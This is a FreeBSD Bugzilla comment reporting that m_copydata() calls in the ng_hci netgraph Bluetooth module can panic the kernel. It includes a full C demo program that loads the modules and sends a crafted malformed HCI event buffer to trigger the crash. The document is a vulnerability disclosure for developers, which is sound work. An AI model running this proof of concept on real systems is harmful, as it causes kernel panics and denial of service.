[Bug 267294] inquiry_result() in ng_hci_event.c ought to check before calling m_copydata()
Date: Wed, 26 Oct 2022 21:28:58 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=267294
--- Comment #1 from Robert Morris <rtm@lcs.mit.edu> ---
The m_copydata() calls in num_compl_pkts() in ng_hci_evnt.c can also
panic. Here's a demo program:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>
#include <netgraph/ng_message.h>
#include <netgraph/ng_socket.h>
#include <netgraph.h>
int
main(){
setlinebuf(stdout);
struct rlimit r;
r.rlim_cur = r.rlim_max = 0;
setrlimit(RLIMIT_CORE, &r);
signal(SIGPIPE, SIG_IGN);
system("kldload netgraph");
system("kldload ng_hci");
int cs = -1;
int ds = -1;
NgMkSockNode(NULL, &cs, &ds);
struct ngm_mkpeer mkp;
memset(&mkp, 0, sizeof(mkp));
strcpy(mkp.type, "hci");
strcpy(mkp.ourhook, "hook");
strcpy(mkp.peerhook, "drv");
if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
NGM_MKPEER, &mkp, sizeof(mkp)) < 0) {
fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook);
}
char buf[128];
memset(buf, 0xff, sizeof(buf));
*(long long *)(buf + 0) ^= 0xecfb;
NgSendData(ds, "hook", (unsigned char *)buf, 116);
}
--
You are receiving this mail because:
You are the assignee for the bug.